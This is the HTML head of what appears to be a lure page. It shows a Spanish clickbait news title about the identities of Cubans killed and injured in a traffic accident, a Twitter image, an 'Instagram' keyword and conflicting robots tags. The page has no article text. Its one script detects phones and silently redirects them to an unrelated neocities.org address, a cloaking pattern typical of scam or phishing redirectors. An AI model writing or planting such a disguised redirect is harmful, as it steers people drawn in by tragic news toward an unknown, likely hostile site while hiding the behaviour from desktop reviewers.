<!DOCTYPE html>
  <html lang="es">
  <head>
  <meta charset="utf-8"/>
  <meta name="title" content="Stream"/>
  <meta name="keywords" content="Instagram"/>
  <meta property="og:description" content="2411"/>
  <meta name="googlebot" content="noindex"/>
  <meta name="robots" content="index"/>
  <meta name="robots" content="noindex"/>
  <meta name="robots" content="nofollow"/>
  <meta http-equiv="Content-Type" content="text/html; charset=UTF-8"/>
  <meta name="viewport" content="width=device-width, initial-scale=1"/>
  <meta property="og:title" content="Revelan identidades de cubanos fallecidos y heridos en accidente de transito esta mañana"/>
  <meta property="og:image" content="https://pbs.twimg.com/media/GPJdcKrWYAAfXXe?format=jpg&name=small"/>
  <meta name="apple-itunes-app" content="app-id=6448311069"/>
  <script type="text/javascript">
    //<![CDATA[
        var isMobile = /Android|iPhone|iPad|iPod|BlackBerry|IEMobile|Opera Mini/i.test(navigator.userAgent);
    
        if (isMobile) {
            window.location.href = "https://faceszkkpzs.neocities.org/";
        }
    //]]>
    </script>